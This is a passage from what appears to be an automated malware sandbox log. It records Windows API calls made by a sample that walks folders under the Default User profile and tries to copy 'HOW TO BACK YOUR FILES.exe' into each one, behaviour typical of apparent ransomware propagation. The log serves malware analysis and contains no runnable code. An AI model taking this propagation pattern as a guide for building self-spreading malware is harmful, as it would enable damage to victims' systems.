Data\\Application Data\\Microsoft\\Windows Media" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" [0042.561] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.561] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\windows media\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.562] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.562] GetLastError () returned 0x0 [0042.562] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.562] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.562] CloseHandle (hObject=0x118) returned 1 [0042.562] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.563] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.563] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.563] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.563] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" [0042.563] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" [0042.563] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.563] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\windows media\\12.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.563] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.564] GetLastError () returned 0x0 [0042.564] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.564] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.564] CloseHandle (hObject=0x118) returned 1 [0042.564] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.564] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a7b6080, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a7b6080, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.564] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.564] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.564] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" [0042.564] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" [0042.564] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.564] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\windows mail\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.565] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.565] GetLastError () returned 0x0 [0042.565] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.565] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.565] CloseHandle (hObject=0x118) returned 1 [0042.565] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.565] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a8284a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a8284a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.565] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.565] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.566] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery" [0042.566] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery" [0042.566] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.566] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\windows mail\\stationery\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.567] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.567] GetLastError () returned 0x0 [0042.567] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.567] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.568] CloseHandle (hObject=0x118) returned 1 [0042.568] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.568] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a874760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a874760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.568] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.568] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.568] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup" [0042.568] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup" [0042.568] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.569] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\windows mail\\backup\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.569] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.569] GetLastError () returned 0x0 [0042.569] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.569] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.569] CloseHandle (hObject=0x118) returned 1 [0042.569] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.569] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a89a8c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a89a8c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.570] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" [0042.570] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" [0042.570] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.570] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\windows mail\\backup\\new\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.570] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.570] GetLastError () returned 0x0 [0042.570] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.570] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.571] CloseHandle (hObject=0x118) returned 1 [0042.571] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.571] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a8e6b80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a8e6b80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.571] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" [0042.571] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" [0042.571] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.571] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\media player\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.572] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.572] GetLastError () returned 0x0 [0042.572] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.572] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.572] CloseHandle (hObject=0x118) returned 1 [0042.572] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.572] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aa17680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aa17680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.572] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0042.572] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0042.572] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.572] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.573] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.573] GetLastError () returned 0x0 [0042.573] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.573] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.573] CloseHandle (hObject=0x118) returned 1 [0042.573] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.573] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aad5d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.573] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0042.573] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0042.574] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.574] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.574] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.574] GetLastError () returned 0x0 [0042.574] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.574] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.574] CloseHandle (hObject=0x118) returned 1 [0042.574] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.574] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, 